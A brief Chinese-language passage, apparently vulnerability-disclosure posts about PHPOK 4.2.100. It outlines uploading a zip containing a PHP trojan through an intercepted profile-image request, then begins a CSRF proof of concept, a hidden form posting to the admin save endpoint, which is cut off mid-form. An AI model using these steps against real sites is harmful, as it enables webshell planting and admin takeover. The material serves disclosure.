admin 发布于 2015-02-08 01:14
版本:4.2.100
前台能上传zip文件,而且对升级文件没进行校验。
上传zip演示:
先把我们的木马文件test.php添加到压缩包内test.zip
注册一个帐号-修改资料.
选择一个正常图片,截获数据
然后修改数据。
成功...
admin 发布于 2015-02-08 01:13
老问题,一直没修复。
poc:
code 区域
<div style="display:none">
<form action="http://localhost/phpok/admin.php?c=admin&f=save" id="poc" name="poc" method="post">
&...
